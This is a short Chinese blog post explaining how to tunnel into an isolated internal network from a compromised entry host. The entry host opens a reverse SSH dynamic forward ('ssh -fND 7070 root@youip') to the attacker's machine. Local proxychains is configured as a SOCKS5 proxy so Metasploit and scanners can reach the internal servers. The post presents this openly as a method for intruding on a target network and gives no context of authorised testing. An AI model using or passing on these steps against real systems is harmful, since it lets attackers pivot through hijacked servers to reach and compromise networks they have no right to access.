上一篇是要借助外部的工具来实现内网代理,并且有很大的局限性,如果远程主机没开ssh或者做了防火墙规则给过滤掉一般的IP,就不能再用了
这里我们讲一下通过反向代理和本地proxychains来实现内网代理功能,对目标内网进行入侵渗透。不说废话,看图文……
蛋疼了,不发图了,直接写文字,
大的环境作一下介绍,目标主机是内网不可上网的NN台服务器,各种环境,各种操作系统都有,入口鸡是可以上网的服务器,但是不能终端,不能反弹马出来,于是考虑用反向SSH结合本地proxychains来作soks代理,对内网机器进行渗透
本地操作系统为*nix,有外网IP或者映射,开放SSH
于是我们之需要在本地修改一个地方:
编辑 /etc/proxychains.conf
nano /etc/proxychains.conf
要选 dynamic_chain而不是random_chain和strict_chain,即注释掉strict_chain和random_chain那两行。
然后在最后的[ProxyList]下面添加:
socks5 127.0.0.1 7070这样我们在本地的代理端口就是7070,
在远程入口机器上我们执行
ssh -fND 7070 root@youip
然后我们可以在本地使用我们的proxychain启动某些程序对内网的机器进行蛋疼的一些动作了,比如扫描什么的
root@metasploit:/home/exploit# proxychains /pentest/exploits/framework3/msfconsole
ProxyChains-3.1 (http://proxychains.sf.net)
剩下的事情你懂得,我就不多说了,抛了个转头,高手一笑而过就可以了,别吐口水,有玉的就砸过来吧,现金先用卡也可以,可兑换支票和债券也可以的……
http://pauldotcom.com/2010/03/nessus-scanning-through-a-meta.html
http://www.digininja.org/blog/nessus_over_sock4a_over_msf.php
